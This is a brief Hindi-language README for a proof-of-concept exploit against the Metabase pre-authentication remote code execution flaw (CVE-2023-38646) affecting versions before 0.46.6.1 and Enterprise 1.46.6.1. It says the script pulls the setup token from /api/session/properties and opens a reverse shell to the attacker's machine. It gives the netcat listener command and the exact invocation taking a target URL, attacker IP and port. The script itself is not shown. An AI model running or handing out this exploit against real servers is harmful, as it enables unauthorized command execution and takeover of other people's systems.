
मेटाबेस प्री-ऑथ RCE POC
Metabase ओपन सोर्स 0.46.6.1 से पहले और Metabase Enterprise 1.46.6.1 से पहले हमलावरों को सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देते हैं। मैंने हमलावर की मशीन पर रिवर्स शेल प्राप्त करने के लिए स्क्रिप्ट सीधे लिखी है।
स्क्रिप्ट को Target URL, Attacker का IP और Port चाहिए। इस exploit के लिए setup token प्रदान करना आवश्यक नहीं है क्योंकि स्क्रिप्ट इसे /api/session/properties से प्राप्त करने का प्रयास करती है।
Attacker मशीन पर netcat listener शुरू करना सुनिश्चित करें, निम्न कमांड का उपयोग करके:
nc -nlvp {Port}
POC स्क्रिप्ट को निम्न के साथ चलाएँ:
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
